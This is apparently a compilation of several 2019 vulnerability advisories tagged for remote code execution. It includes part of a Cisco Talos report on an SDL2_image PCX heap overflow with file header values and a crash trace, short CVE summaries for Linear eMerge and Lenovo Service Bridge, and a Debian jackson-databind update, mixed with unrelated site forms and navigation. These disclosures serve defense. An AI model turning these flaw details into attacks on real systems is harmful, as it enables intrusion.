    ubyte Reserved			255	40h	1h	Fg: Bg:	
    ubyte NPlanes			1	41h	1h	Fg: Bg:	
    ushort BytesPerLine		32769	42h	2h	Fg: Bg:	
    ushort PaletteInfo		18	44h	2h	Fg: Bg:	
    ushort HscreenSize		0	46h	2h	Fg: Bg:	
    ushort VscreenSize		0	48h	2h	Fg: Bg:	
    ubyte Filler[54]		4Ah	36h	Fg: Bg:	
    

An attacker fulling controlling the size of overwrite (via size of the file) and its content, can turn this heap-based buffer overflow in a remote code execution.

**Crash Information**

    	./showimage PoC.pcx
    ==12669==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0xa896ce70 in thread T0
    	#0 0xb7245a84 in free (/usr/lib/i386-linux-gnu/libasan.so.2+0x96a84)
    	#1 0x81259b3 in SDL_free_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/stdlib/SDL_malloc.c:5372
    	#2 0x8131dd2 in SDL_FreePalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_pixels.c:735
    	#3 0x8131b32 in SDL_SetPixelFormatPalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_pixels.c:685
    	#4 0x813d1f5 in SDL_SetSurfacePalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:221
    	#5 0x81448d1 in SDL_FreeSurface_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:1233
    	#6 0x80abfd7 in SDL_FreeSurface /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/dynapi/SDL_dynapi_procs.h:475
    	#7 0x805875f in IMG_LoadPCX_RW ../IMG_pcx.c:252
    	#8 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#9 0x804beff in IMG_Load ../IMG.c:136
    	#10 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#11 0x804b65c in main ../showimage.c:101
    	#12 0xb6f99636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    	#13 0x804ad50  (/home/icewall/bugs/SDL_src/SDL2_image-2.0.4/build/showimage+0x804ad50)
    
    0xa896ce70 is located 0 bytes inside of 536870912-byte region [0xa896ce70,0xc896ce70)
    ASAN:SIGSEGV
    ==12669==AddressSanitizer: while reporting a bug found another one. Ignoring.
    

**Timeline**

2019-05-08 - Vendor Disclosure  
2019-07-01 - Vendor Patched; Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2019-5052: TALOS-2019-0821 || Cisco Talos Intelligence Group

Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH).

Sign up

**Sign up for this Training**

Training Registration

**Registration Complete!**

A confirmation has been sent to the email address provided.

An Applied Risk team member will contact you as soon as possible for further details.

Sign up

**Sign up for this Training**

Resource Download

**Thank you for downloading the whitepaper**

A confirmation has been sent to the email address provided.

If you have any questions, do not hesitate to contact our team of industrial cyber security professionals.

Free Whitepaper

**Download the whitepaper**

Resource Download

**Thank you for downloading the whitepaper**

A confirmation has been sent to the email address provided.

If you have any questions, do not hesitate to contact our team of industrial cyber security professionals.

Apply

**Apply for Resources Overview**

CVE-2019-7265: Resources - Applied Risk

A vulnerability reported in Lenovo Service Bridge before version 4.1.0.1 could allow remote code execution.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Sales Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2019-6168: Lenovo Service Bridge Vulnerabilities - Lenovo Support DE

FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.

*   _To_: debian-lts-announce@lists.debian.org
*   _Subject_: \[SECURITY\] \[DLA 1831-1\] jackson-databind security update
*   _From_: Markus Koschany <apo@debian.org\>
*   _Date_: Fri, 21 Jun 2019 17:09:36 +0200
*   _Message-id_: <\[🔎\] 1dc2282f-a7aa-3af5-6e34-f2cbc537032d@debian.org\>
*   _Mail-followup-to_: debian-lts@lists.debian.org
*   _Reply-to_: debian-lts@lists.debian.org

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : jackson-databind
Version        : 2.4.2-2+deb8u7
CVE ID         : CVE-2019-12384 CVE-2019-12814
Debian Bug     : 930750

More Polymorphic Typing issues were discovered in jackson-databind. When
Default Typing is enabled (either globally or for a specific property)
for an externally exposed JSON endpoint and the service has JDOM 1.x or
2.x or logback-core jar in the classpath, an attacker can send a
specifically crafted JSON message that allows them to read arbitrary
local files on the server.

For Debian 8 "Jessie", these problems have been fixed in version
2.4.2-2+deb8u7.

We recommend that you upgrade your jackson-databind packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAl0M8zBfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7
UeTY4Q/9FfVWKCgD0UUDIdGRmNRutcG6vrkmD30bUd88QVafXC+IKWnvM8T1QDUQ
eJrfEtI5Ao7EevfK5ark6XxYA1JVpqe4cLJtsV4/9VwgczJa2h4RNS52flDDPxZz
oumtjbUFRT98wkmJDXn/4GiEDvHCtX2RtdoNtT1EDqB1IjYO4TcBUjgsT4yAUB8u
kh4H8Md6ILeBV2+IUGg25oZypmp4ZQY/h1q4Hrfb9crLjLWkod/k1otAxrbJ10W0
Px2bb32MPVlYz+D8Q8YoMSoktuhwOjyi/DMHsIgeF2/h8qlLvrNe5AtX4VAcKc5z
mGlNum0M57HgfxOwcmqMFruEcqtU8FIpbUqqZm8K+wtp6x5kQnrZn/eGVG/bih7c
f9KDY2KixbSQZwW38FgQMZtbSbhF/Wsa0xHB1n0wXYLHsLlmaJiEmgVbAdcJQEi+
UHpw0MttJT9rXvYLfnK3+NseQ1e+V95m8lHb28z1cqXj4cdFKY14Nf4MpJw4EkXQ
3bvQeuzBaneQDjj1DDKalYSpjwtn1GO2kWfdAJqus8Qwe3aoWHy0TVtpCpQjJG9F
vyhwwK58dJTx+YfOJPe3eKPy0UNQrS1nLJYjlj6A2cGUcaj5+YK2zCes8r9WT5Id
oG1L7voMiTZVDiAs1Flo4PVO1fNI9VTSoTiEo3Ym4W1ksuvvZHY=
=MAUn
-----END PGP SIGNATURE-----

**Reply to:**

*   debian-lts-announce@lists.debian.org
*   Markus Koschany (on-list)
*   Markus Koschany (off-list)

*   Prev by Date: **\[SECURITY\] \[DLA 1789-2\] intel-microcode security update**
*   Next by Date: **\[SECURITY\] \[DLA 1832-1\] libvirt security update**
*   Previous by thread: **\[SECURITY\] \[DLA 1789-2\] intel-microcode security update**
*   Next by thread: **\[SECURITY\] \[DLA 1832-1\] libvirt security update**
*   Index(es):
    *   **Date**
    *   **Thread**

Tag

#rce